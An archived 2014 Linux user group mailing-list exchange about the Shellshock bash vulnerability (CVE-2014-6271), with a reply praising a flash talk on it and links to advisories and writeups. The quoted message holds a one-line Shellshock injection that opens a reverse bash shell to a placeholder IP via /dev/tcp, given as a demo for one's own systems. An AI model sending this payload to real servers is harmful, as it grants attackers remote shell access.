[dundee] shellshock (bash bug)
Paul Sutherland
newsonthegrapevine at gmail.com
Fri Sep 26 09:19:25 UTC 2014
On 25 Sep 2014, at 23:15, Gordon Gray <gordo.gray at gmail.com> wrote:
> sources from my talk earlier:
>
> cve
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
> better explanation
> http://seclists.org/oss-sec/2014/q3/650
> easy to use poc
> https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
> pretty decent writeup
> http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
> ping scan
> http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html
> local bash test
> http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b
>
> and this is the live demo i would have done if my vps host wasn't being dos'd. don't run this on anything you don't (already) own
> () { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1
>
> mail me to discuss public demos if you need to scare the shit out of your boss for a budget increase :)
> but seriously, don't break the law. if you do it's not my fault. i'm not liable. don't sue me. ass covered.
> _______________________________________________
> dundee GNU/Linux Users Group mailing list
> dundee at mailman.lug.org.uk http://dundee.lug.org.uk
> https://mailman.lug.org.uk/mailman/listinfo/dundee
> Chat on IRC, #tlug on irc.lug.org.uk
Well done on pulling that flash talk together last night Gordon, it was very good.
I am already reading articles in the press that are criticising Open Source software, in particular calling into question that bash appears to have a single maintainer and it follows on from the recent heart bleed vulnerability.
Paul
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.lug.org.uk/pipermail/dundee/attachments/20140926/b3bf0fbd/attachment.html>
More information about the dundee
mailing list